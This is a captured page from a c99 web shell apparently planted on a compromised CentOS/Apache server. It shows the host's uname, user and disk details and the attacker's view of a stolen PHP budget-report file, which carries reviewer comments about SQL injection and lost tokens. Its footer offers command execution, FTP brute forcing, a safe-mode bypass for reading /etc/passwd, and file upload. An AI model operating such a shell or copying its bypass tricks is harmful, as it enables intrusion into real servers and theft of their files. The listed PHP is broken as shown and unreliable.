!c99Shell v. 1.0 pre-release build #16!

Software: Apache/2.2.3 (CentOS). PHP/5.1.6 

uname -a: Linux mx-ll-110-164-51-230.static.3bb.co.th 2.6.18-194.el5PAE #1 SMP Fri Apr 2 15:37:44
EDT 2010 i686
 

uid=48(apache) gid=48(apache) groups=48(apache) 

Safe-mode: OFF (not secure)

/var/www/html/manage/Plan_new/   drwxr-xr-x
Free 51.01 GB of 127.8 GB (39.91%)
Home    Back    Forward    UPDIR    Refresh    Search    Buffer    Encoder    Tools    Proc.    FTP brute    Sec.    SQL    PHP-code    Update    Feedback    Self remove    Logout    


Viewing file:     MISP103.php (16.96 KB)      -rw-r--r--
<?php

    /*
     * Page bootstrap: starts the session, gates access on session state, loads
     * the site configuration / framework / helper includes, opens the database
     * object and sets a few table-name variables.
     *
     * NOTE(review): as captured, this listing appears to have lost tokens (for
     * example the `=` of assignments, the `.` of string concatenation and the
     * `(` after define), so the text is not runnable PHP as shown. The comments
     * describe only what is visible.
     *
     * NOTE(review): $Budget_Year, $ProjectId, $MoneyS_C, $page, $display, $limit
     * and $PHP_SELF are used further down the page but are never assigned in
     * this listing; presumably they arrive through register_globals or one of
     * the includes - confirm. Further down they are echoed into HTML and
     * interpolated into SQL strings with no escaping visible.
     */
    session_start
();
    
    
/**  Define Validate Access
 *   Declares the _VALID_ACCESS marker; the value given to it is not visible in
 *   this listing. Presumably the included files test it to refuse direct
 *   requests - confirm against the includes.
 */
    
define'_VALID_ACCESS');

    
/**  Check Session User Login
 *   The request is rejected only when NEITHER "valid_user" NOR "Priority" is
 *   registered in the session (the two negated tests are joined with &&), so
 *   having just one of them registered is enough to reach the page.
 *   NOTE(review): confirm that is intended; requiring both would need ||.
 *   session_is_registered() was deprecated in PHP 5.3 and removed in 5.4;
 *   isset($_SESSION['...']) is the supported check.
 */
    
if( !session_is_registered("valid_user") && !session_is_registered("Priority") ) {
        // Rejection path: declare the windows-874 (Thai) charset, print a Thai
        // "please log in first" notice, schedule a 1-second meta refresh to
        // ../login.php, then stop so nothing below runs for this request.
        echo 
"<meta http-equiv=\"Content-Type\" content=\"text/html; charset=windows-874\" />";
        echo 
"<p style=padding-top:115px><p align=center><br /><font color=red><strong>กรุณาทำการ Login ก่อน</strong></font></p></p>";
        echo 
"<meta http-equiv=\"refresh\" content=\"1; URL=../login.php\" />";
        exit();
    } 
    else {
        
/**  Configuration
 *   $_Config_absolute_path is not assigned in this listing; presumably it is
 *   set by configuration.php - confirm. It is used to build the framework
 *   include path, so it must never be request-controlled.
 */
        
require_once( "../configuration.php" );
        require_once( 
$_Config_absolute_path "/includes/framework.php" );
        require_once( 
"../includes/Function.php" );
    
        
/**  Create Database Object
 *   DBConn is not defined in this listing; presumably it comes from one of the
 *   files included above.
 */
        
$dbObj = new DBConn;

        
//=== SESSION
// $valid_user is not assigned in this listing; presumably it is the
// session-registered global (register_globals era) - confirm.
        
$Username $valid_user
    
        
/**  Chart  */
        
include ("../includes/charts.php");

        
        
/**  Config Table for This Page
 *   None of these variables is referenced again in this listing; the queries
 *   further down hard-code their table names.
 */
        
$myTable "project_type_tb";
        
$myTable1 "project_tb";
        
$myTablePK "Faculty_code";
        
$myTable2 "money_source_tb";
        
$myTablePK2 "MoneyS_C";
        
$myTable3 "faculty_tb";
    

        
    } 
# else
 
?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=windows-874" />
<link href="../css/default.css" rel="stylesheet" type="text/css" />
<script language="javascript" src="../js/utilities.js"></script>

<title>แผนการดำเนินงาน</title>
<script type="text/javascript">
<!--
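/**
 * Jump-menu handler: points the window/frame named by `targ` at the URL held
 * in the currently selected <option>, then optionally resets the menu.
 *
 * The original built a statement string (targ + ".location='" + value + "'")
 * and ran it through eval(), so any quote inside an option value was parsed
 * as script instead of being treated as part of the URL. The option values on
 * this page are printed from database rows without escaping, so the value is
 * now assigned as plain data and nothing is evaluated.
 *
 * @param {string}  targ     Dotted name of the target, e.g. "parent" or "top".
 * @param {object}  selObj   The <select> element that fired the change.
 * @param {*}       restore  Truthy to reset the menu to its first entry.
 */
function MM_jumpMenu(targ,selObj,restore){ //v3.0
  var root = (typeof window !== "undefined") ? window : globalThis;
  var names = String(targ).split(".");
  var target = root;
  // Walk the dotted name one plain identifier at a time; anything that is not
  // a simple identifier is refused rather than evaluated.
  for (var i = 0; i < names.length && target != null; i++) {
    target = /^[A-Za-z_$][A-Za-z0-9_$]*$/.test(names[i]) ? target[names[i]] : null;
  }
  if (target != null) {
    target.location = selObj.options[selObj.selectedIndex].value;
  }
  if (restore) selObj.selectedIndex=0;
}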
//-->
</script>
</head>

<body topmargin="0" rightmargin="0" bottommargin="0" leftmargin="0">

<table width="1054" border="0" cellspacing="0" cellpadding="0">
  <tr>
    <td width="1054" align="left" valign="top" style="padding:10px 0px 5px 10px">
          <fieldset><legend><font size="2" color="<?php echo $GLOBALS["COLOR_FONT_3"]; ?>"><a href="index.php">หน้าหลัก</a></font><img src="../picture/ico3.gif" width="10" height="10" align="absmiddle" border="0" /></font></font><font size="2" color="<?php echo $GLOBALS["COLOR_FONT_3"]; ?>"><a href="Menu_Report.php?Budget_Year=<?=$Budget_Year ;?>">รายงานประเภทต่างๆ</a></font><img src="../picture/ico3.gif" width="10" height="10" align="absmiddle" border="0" /></font></font><span class="NOTE">แผนการจัดสรรงบประมาณประจำปีจำแนกตามฝ่าย/พันธกิจและประเภทเงิน</a></font></span></legend>
        <table width="1033" border="0" cellspacing="0" cellpadding="0">
          <form id="myForm" name="myForm" method="post" action="<?=$PHP_SELF;?>?Budget_Year=<?=$Budget_Year;?>&amp;ProjectId=<?=$ProjectId;?>&amp;MoneyS_C=<?=$MoneyS_C;?>&amp;page=<?=$page;?>">
            <tr>
              <td width="1033" height="5" colspan="2"></td>
            </tr>
            <tr>
              <td colspan="2"><table width="99%" border="0" align="center" cellpadding="0" cellspacing="0">
                  <tr>
                    <td align="left" style="padding-bottom:5px;"><span class="PADDING-TOP-10 PADDING-BOTTOM-5"><img src="../images/icons/arrow-circle-225-left.png" width="16" height="16" border="0" align="absmiddle" /> <a href="javascript:;" onclick="window.history.back();"><strong>&lsaquo; ย้อนกลับ</strong></a></span></td>
                    <td align="right" style="padding-bottom:5px;"><select name="jumpMenu" id="jumpMenu" onchange="MM_jumpMenu('parent',this,0)">
                        <option>
                          <?php
                                   // Year selector: reads every row of project_year ordered by
                                   // Budget_Year and prints one <option> per year that points at
                                   // SpendingSum.php for that year.
                                   //
                                   // NOTE(review): this query goes through mysql_query() /
                                   // mysql_fetch_array() directly instead of the $dbObj wrapper used
                                   // by the rest of the page, and the result is not checked before
                                   // the fetch loop. The mysql_* extension was removed in PHP 7.
                                   //
                                   // NOTE(review): $rs4['Budget_Year'] is printed into the value
                                   // attribute and the option text without htmlspecialchars() or
                                   // urlencode(), and the selected value is later passed to eval()
                                   // by MM_jumpMenu. As shown, the value attribute's closing quote
                                   // is also missing before 'selected'. The loop's closing brace is
                                   // not visible in the last island (only the "# while" marker);
                                   // presumably it was lost in capture.
                                   $strSQL 
" SELECT * FROM   project_year    ORDER by Budget_Year asc    ";
                                
$result4 mysql_query($strSQL);
                                while( 
$rs4 mysql_fetch_array($result4) ) {
                            
?>
                        </option>
                        <option value="SpendingSum.php?Budget_Year=<?=$rs4['Budget_Year'];?><?php if( $rs4['Budget_Year']==$Budget_Year ) echo 'selected'?>>
                          <?=$rs4['Budget_Year'];?>
                        </option>
                        <?php
                                
# while
                            
?>
                      </select>
                    </td>
                  </tr>
                  <tr>
                    <td width="74%" align="left" style="padding-bottom:5px;">ทั้งหมด: <strong><?=$numrows;?></strong> รายการ</td>
                    <td width="26%" align="right" style="padding-bottom:5px;"><a href="ExcelSpendingSum.php?Budget_Year=<? echo $Budget_Year?>"><strong>ส่งออกข้อมูล &rsaquo;</strong></a> <img src="../images/icons/excel.png" width="16" height="16" border="0" align="absmiddle" /></td>
                  </tr>
              </table></td>
            </tr>
            <tr>
              <td height="122" colspan="2" align="center" valign="top"><table width="1019" border="0" align="center" cellpadding="1" cellspacing="0" class="BORDER-GREY">
                <tr bgcolor="#F8F8F8">
                  <td width="28" rowspan="2" align="center"  class="BORDER-RIGHT">No</td>
                  <td width="358" rowspan="2" align="center" bgcolor="#F8F8F8">ชื่อหน่วยงาน</td>
                  <td height="23" colspan="3" align="center" class="BORDER-LEFT">งบประมาณที่อนุมัติ</td>
                  <td colspan="2" align="center" class="BORDER-LEFT">ประเภทของเงิน</td>
                  <td colspan="2" align="center" class="BORDER-LEFT">รวมเงิน</td>
                  </tr>
                  <tr bgcolor="<?=$bgColor;?>" onmouseover="this.style.backgroundColor='#F5F9F9'" onmouseout="this.style.backgroundColor=''">
                  <td width="114" height="23" align="center" bgcolor="#F8F8F8"  class="PADDING-LEFT-3 BORDER-TOP-LEFT">งานยุทธศาสตร์</td>
                  <td width="100" align="center" bgcolor="#F8F8F8"  class="PADDING-LEFT-3 BORDER-TOP-LEFT">งานประจำ</td>
                  <td width="99" align="center" bgcolor="#F8F8F8"  class="PADDING-LEFT-3 BORDER-TOP-LEFT">รวม</td>
                  <td width="79" align="center" bgcolor="#F8F8F8"  class="PADDING-LEFT-3 BORDER-TOP-LEFT">&nbsp;</td>
                  <td width="86" align="center" bgcolor="#F8F8F8"  class="PADDING-LEFT-3 BORDER-TOP-LEFT">&nbsp;</td>
                  <td width="75" align="center" bgcolor="#F8F8F8"  class="PADDING-LEFT-3 BORDER-TOP-LEFT">จำนวน</td>
                  <td width="54" align="center" bgcolor="#F8F8F8"  class="PADDING-LEFT-3 BORDER-TOP-LEFT">ร้อยละ</td>
                </tr>
                 <?php 
                 // Report body. Outer loop: one summary row per active faculty
                 // (FacultyStatus = 'Y'). Inner loop (further down): one row per
                 // facultycon_tb group belonging to that faculty.
                 //
                 // NOTE(review): every query below is built by interpolating
                 // $Budget_Year (and a row value) into the SQL text inside quotes, with
                 // no escaping or parameter binding visible. $Budget_Year is not assigned
                 // anywhere in this listing and is passed as a query-string parameter in
                 // the page's links; if it is request-controlled this is SQL injection.
                 // Bind it as a parameter, or at minimum validate it as an integer year
                 // before use. Whether execQuery() escapes anything is not visible here.
                 //
                 // NOTE(review): each faculty row issues six queries and each group row
                 // three more; the sums could be fetched with one grouped query.
                 $query 
" SELECT *  FROM  faculty_tb  Where   FacultyStatus ='Y'    ";
                 
$result $dbObj->execQuery($query);
                 
// NOTE(review): $numrows is echoed in the header table earlier in the page,
// i.e. before this assignment runs (unless an include also sets it).
$numrows $dbObj->_numrows;
               
// $display and $limit are not assigned in this listing - confirm where they come from.
$no 1+($display-1)*$limit;
            while( 
$rs $dbObj->fetchArray($result) ) { 
                
// Alternate the row background between the two colours.
$bgColor = ( $bgColor == "#FFFFFF" ) ? "#F9FBFB" "#FFFFFF";
                
                
// $Faculty_code is not used again in this listing; the queries read $rs[Faculty_code].
$Faculty_code $rs['Faculty_code'];
          
?>
                <tr bgcolor="<?=$bgColor;?>" onmouseover="this.style.backgroundColor='#F5F9F9'" onmouseout="this.style.backgroundColor=''">
                  <td align="center" class="BORDER-TOP-RIGHT"><?=$no;?></td>
                  <td height="23" align="left" class="BORDER-TOP PADDING-LEFT-3">&nbsp;<strong><?php /* NOTE(review): printed without htmlspecialchars(); stored markup in Faculty_name would be rendered as HTML. */ echo $rs['Faculty_name']; ?></strong></td>
                  <td align="right"  class="PADDING-RIGHT-3 BORDER-TOP-LEFT"><strong>
                    <?php         
                // Column "งานยุทธศาสตร์" (strategic work): sum of Budget_total for this
                // faculty and year where codeId = '1'.
                $sql 
" SELECT SUM(Budget_total) AS  B6  FROM project_type_tb pt  , project_plan pp  Where   pp.Faculty_code='$rs[Faculty_code]' and  pp.proId=pt.proId  and  pp.Budget_Year='$Budget_Year'  and  pp.codeId='1'   ";
                
$result5 $dbObj->execQuery($sql);
                
$rs5 $dbObj->fetchArray($result5);
                    echo 
number_format($rs5['B6'],2,'.',',');
           
?>
                    <?php
                    
/*
                    
                   $sql4 = "  SELECT SUM(Budget_total) AS SumC6  FROM   project_type_tb pt, projectstra_type_tb ps ,proplanstrateg_tb pj , prostrategymap_tb pm  Where  pt.Faculty_code='$rs[Faculty_code]'  and   pt.proId=ps.proId  and   ps.StratempId=pj.StratempId  and  pj.StratempId=pm.StratempId  and  ps.StaplanId=pj.StaplanId  and  pt.Budget_Year='$Budget_Year' ";
                   $result4 = $dbObj->execQuery($sql4);
                   $rss4 = $dbObj->fetchArray($result4);
                       echo number_format($rss4['SumC6'],2,'.',',');
                */    
           
?> </strong>
                  </td>
                  <td align="right"  class="PADDING-RIGHT-3 BORDER-TOP-LEFT"><strong>
                    <?php         
                // Column "งานประจำ" (routine work): same sum restricted to codeId = '2'.
                $sql 
" SELECT SUM(Budget_total) AS  B6  FROM project_type_tb pt  , project_plan pp  Where   pp.Faculty_code='$rs[Faculty_code]' and  pp.proId=pt.proId  and  pp.Budget_Year='$Budget_Year'  and  pp.codeId='2'   ";
                
$result5 $dbObj->execQuery($sql);
                
$rs5 $dbObj->fetchArray($result5);
                    echo 
number_format($rs5['B6'],2,'.',',');
           
?></strong>
                  </td>
                  <td align="right"  class="PADDING-RIGHT-3 BORDER-TOP-LEFT"><strong>
                    <?php         
                // Column "รวม" (total): the sum with no codeId filter.
                $sql 
" SELECT SUM(Budget_total) AS  B6  FROM project_type_tb pt  , project_plan pp  Where   pp.Faculty_code='$rs[Faculty_code]' and  pp.proId=pt.proId  and  pp.Budget_Year='$Budget_Year'    ";
                
$result5 $dbObj->execQuery($sql);
                
$rs5 $dbObj->fetchArray($result5);
                    echo 
number_format($rs5['B6'],2,'.',',');
           
?></strong>
                 </td>
                  <td align="center"  class="PADDING-LEFT-3 BORDER-TOP-LEFT">&nbsp;</td>
                  <td align="center"  class="PADDING-LEFT-3 BORDER-TOP-LEFT">&nbsp;</td>
                  <td align="right"  class="PADDING-RIGHT-3 BORDER-TOP-LEFT"><strong>
                    <?php         
                // Column "จำนวน" (amount): the query text is identical to the total
                // column's query above, so the same value is fetched a second time.
                $sql 
" SELECT SUM(Budget_total) AS  B6  FROM project_type_tb pt  , project_plan pp  Where   pp.Faculty_code='$rs[Faculty_code]' and  pp.proId=pt.proId  and  pp.Budget_Year='$Budget_Year'    ";
                
$result5 $dbObj->execQuery($sql);
                
$rs5 $dbObj->fetchArray($result5);
                    echo 
number_format($rs5['B6'],2,'.',',');
           
?>
                  </strong></td>
                  <td align="center"  class="PADDING-LEFT-3 BORDER-TOP-LEFT">
                    <?php  
                 // Column "ร้อยละ" (percent): this faculty's sum (C6) as a share of the
                 // sum over all faculties for the year (B1).
                 // C6 repeats the faculty total query a third time under another alias.
                 $sql 
" SELECT SUM(Budget_total) AS  C6  FROM   project_type_tb pt  , project_plan pp  Where   pp.Faculty_code='$rs[Faculty_code]' and  pp.proId=pt.proId  and  pp.Budget_Year='$Budget_Year'   ";
                
$result3 $dbObj->execQuery($sql);
                
$rss $dbObj->fetchArray($result3);            
                
// B1 does not depend on the current faculty, yet it is re-queried on every
// iteration of the outer loop.
$sql " SELECT SUM(Budget_total) AS B1  FROM  project_type_tb pt  , project_plan pp  Where  pp.proId=pt.proId  and  pp.Budget_Year='$Budget_Year'  ";
                    
$result2 $dbObj->execQuery($sql);
                    
$rss2 $dbObj->fetchArray($result2);
                    
                    
// NOTE(review): SUM() over no matching rows yields NULL, so for a year with no
// data the divisor is NULL/0 and this is a division by zero; guard B1 first.
$per2= ( $rss['C6'] * 100 ) / $rss2['B1']  ;
                        echo 
number_format($per2,'2','.','')." %"
                
?>
                 </td>
                </tr>
                <?php
                // Inner loop: the groups (facultycon_tb rows) of the current faculty.
                // $rss is reused as the loop variable, replacing the row fetched for
                // the percentage above, which has already been printed by then.
                $sql 
" SELECT * FROM  facultycon_tb  Where  Faculty_code='$rs[Faculty_code]'    " ;
                
$result19 $dbObj->execQuery($sql); 
               
$ni 1+($display-1)*$limit;
           while( 
$rss $dbObj->fetchArray($result19) ) { 
                
$bgColor = ( $bgColor == "#FFFFFF" ) ? "#F9FBFB" "#FFFFFF";
          
?>
                <tr bgcolor="<?=$bgColor;?>" onmouseover="this.style.backgroundColor='#F5F9F9'" onmouseout="this.style.backgroundColor=''">
                  <td align="center" class="BORDER-TOP-RIGHT">&nbsp;</td>
                  <td height="23" align="left" class="BORDER-TOP">&nbsp;&nbsp;
                    <?=$ni;?>
                    .<?=$rss['Group_name']; ?>
                    </a></td>
                  <td align="right"  class="PADDING-RIGHT-3 BORDER-TOP-LEFT">
                    <?php         
                // Group row, strategic-work column: sum for this group (conId) and
                // year where codeId = '1'. Same string-built SQL pattern as above.
                $sql 
" SELECT SUM(Budget_total) AS  B6  FROM project_type_tb pt  , project_plan pp  Where   pp.conId='$rss[conId]' and  pp.proId=pt.proId  and  pp.Budget_Year='$Budget_Year'  and  pp.codeId='1'   ";
                
$result5 $dbObj->execQuery($sql);
                
$rs5 $dbObj->fetchArray($result5);
                    echo 
number_format($rs5['B6'],2,'.',',');
           
?>
                    <?php
                    
/*
                   $sql4 = "  SELECT SUM(Budget_total) AS SumC6  FROM   project_type_tb pt, projectstra_type_tb ps ,proplanstrateg_tb pj , prostrategymap_tb pm  Where  pt.Faculty_code='$rs[Faculty_code]'  and   pt.proId=ps.proId  and   ps.StratempId=pj.StratempId  and  pj.StratempId=pm.StratempId  and  ps.StaplanId=pj.StaplanId  and  pt.Budget_Year='$Budget_Year' ";
                   $result4 = $dbObj->execQuery($sql4);
                   $rss4 = $dbObj->fetchArray($result4);
                       echo number_format($rss4['SumC6'],2,'.',',');
                    */
           
?>
                  </td>
                  <td align="right"  class="PADDING-RIGHT-3 BORDER-TOP-LEFT">
                    <?php         
                // Group row, routine-work column: codeId = '2'.
                $sql 
" SELECT SUM(Budget_total) AS  B6  FROM project_type_tb pt  , project_plan pp  Where   pp.conId='$rss[conId]' and  pp.proId=pt.proId  and  pp.Budget_Year='$Budget_Year'  and  pp.codeId='2'  ";
                
$result5 $dbObj->execQuery($sql);
                
$rs5 $dbObj->fetchArray($result5);
                    echo 
number_format($rs5['B6'],2,'.',',');
           
?>
                  </td>
                  <td align="right"  class="PADDING-RIGHT-3 BORDER-TOP-LEFT">
                    <?php         
                // Group row, total column: no codeId filter.
                $sql 
" SELECT SUM(Budget_total) AS  B6  FROM project_type_tb pt  , project_plan pp  Where   pp.conId='$rss[conId]' and  pp.proId=pt.proId  and  pp.Budget_Year='$Budget_Year'    ";
                
$result5 $dbObj->execQuery($sql);
                
$rs5 $dbObj->fetchArray($result5);
                    echo 
number_format($rs5['B6'],2,'.',',');
           
?>
                  </td>
                  <td align="center"  class="PADDING-LEFT-3 BORDER-TOP-LEFT">&nbsp;</td>
                  <td align="center"  class="PADDING-LEFT-3 BORDER-TOP-LEFT">&nbsp;</td>
                  <td align="center"  class="PADDING-LEFT-3 BORDER-TOP-LEFT">&nbsp;</td>
                  <td align="center"  class="PADDING-LEFT-3 BORDER-TOP-LEFT">&nbsp;</td>
                  <?php 
               // Next group number; closes the inner (group) loop.
               $ni
++;
            } 
# while 
          
?>
                  <?php 
               // Next faculty number; closes the outer (faculty) loop.
               $no
++;
            } 
# while 
          
?>
                </tr>
                <tr bgcolor="<?=$bgColor;?>" onmouseover="this.style.backgroundColor='#F5F9F9'" onmouseout="this.style.backgroundColor=''">
                  <td height="19" colspan="2" align="center" bgcolor="#FFCCCC" class="BORDER-TOP"><strong>รวม</strong></td>
                  <td align="right" bgcolor="#FFCCCC" class="PADDING-RIGHT-3 BORDER-TOP-LEFT"><?php         
                // Grand-total row ("รวม"): the same sums as the per-faculty rows but
                // with no Faculty_code filter. This first cell is codeId = '1'.
                // NOTE(review): $Budget_Year is interpolated into each query below
                // inside quotes with no escaping or binding visible; it is not assigned
                // in this listing. Bind or validate it before use.
                $sql 
" SELECT SUM(Budget_total) AS  B6  FROM project_type_tb pt  , project_plan pp  Where  pp.proId=pt.proId  and  pp.Budget_Year='$Budget_Year'  and  pp.codeId='1'   ";
                
$result5 $dbObj->execQuery($sql);
                
$rs5 $dbObj->fetchArray($result5);
                    echo 
number_format($rs5['B6'],2,'.',',');
           
?></td>
                  <td align="right" bgcolor="#FFCCCC" class="PADDING-RIGHT-3 BORDER-TOP-LEFT">
                    <?php         
                // Grand total for codeId = '2'.
                $sql 
" SELECT SUM(Budget_total) AS  B6  FROM project_type_tb pt  , project_plan pp  Where  pp.proId=pt.proId  and  pp.Budget_Year='$Budget_Year'  and  pp.codeId='2'   ";
                
$result5 $dbObj->execQuery($sql);
                
$rs5 $dbObj->fetchArray($result5);
                    echo 
number_format($rs5['B6'],2,'.',',');
           
?>
                 </td>
                  <td align="right" bgcolor="#FFCCCC" class="PADDING-RIGHT-3 BORDER-TOP-LEFT">
                    <?php         
                // Grand total over all codeId values for the year.
                $sql 
" SELECT SUM(Budget_total) AS  B6  FROM project_type_tb pt  , project_plan pp  Where  pp.proId=pt.proId  and  pp.Budget_Year='$Budget_Year'  ";
                
$result5 $dbObj->execQuery($sql);
                
$rs5 $dbObj->fetchArray($result5);
                    echo 
number_format($rs5['B6'],2,'.',',');
           
?>
                  </td>
                  <td align="center" bgcolor="#FFCCCC" class="PADDING-LEFT-3 BORDER-TOP-LEFT">&nbsp;</td>
                  <td align="center" bgcolor="#FFCCCC" class="PADDING-LEFT-3 BORDER-TOP-LEFT">&nbsp;</td>
                  <td align="right" bgcolor="#FFCCCC" class="PADDING-RIGHT-3 BORDER-TOP-LEFT">
                    <?php         
                // Query text is identical to the previous cell's; the same grand
                // total is fetched and printed again.
                $sql 
" SELECT SUM(Budget_total) AS  B6  FROM project_type_tb pt  , project_plan pp  Where  pp.proId=pt.proId  and  pp.Budget_Year='$Budget_Year'  ";
                
$result5 $dbObj->execQuery($sql);
                
$rs5 $dbObj->fetchArray($result5);
                    echo 
number_format($rs5['B6'],2,'.',',');
           
?>
                  </td>
                  <td align="center" bgcolor="#FFCCCC" class="PADDING-LEFT-3 BORDER-TOP-LEFT">&nbsp;</td>
                </tr>
              </table>
                
                <table width="750" border="0" cellspacing="0" cellpadding="0">
                  <tr>
      <td align="center"></td>
      </tr>
  </table>
</td>
            </tr>
            <tr>
              <td colspan="2">&nbsp;</td>
        </tr></form></table>
    </fieldset></td>
  </tr>
</table>
<?php include("../templates/incFooter.php"); ?>
</body>
</html>
<?php
    // Page teardown: release a result handle, close the database connection
    // and drop the DBConn object, in that order.
    
/**  Free Resource
 *   NOTE(review): $result1 is never assigned in this listing - the page's
 *   queries store their handles in $result, $result2, $result3, $result4,
 *   $result5 and $result19 - so this call presumably frees nothing unless an
 *   include sets $result1. Confirm which handle was meant.
 */
    
$dbObj->freeresult($result1);
    
    
/**  Close the Database  */
    
$dbObj->disconn();
    
    
/**  Unset Class  */
    
unset($dbObj);
?>

:: Command execute ::

Enter:
 
Select:
 

:: Shadow's tricks :D ::

Useful Commands
 
Warning. Kernel may be alerted using higher levels
Kernel Info:

:: Preddy's tricks :D ::

Php Safe-Mode Bypass (Read Files)

File:

eg: /etc/passwd

Php Safe-Mode Bypass (List Directories):

Dir:

eg: /etc/

:: Search ::
  - regexp 

:: Upload ::
 
[ ok ]

:: Make Dir ::
 
[ ok ]
:: Make File ::
 
[ ok ]

:: Go Dir ::
 
:: Go File ::
 

--[ c999shell v. 1.0 pre-release build #16 Modded by Shadow & Preddy | RootShell Security Group | r57 c99 shell | Generation time: 0.0133 ]--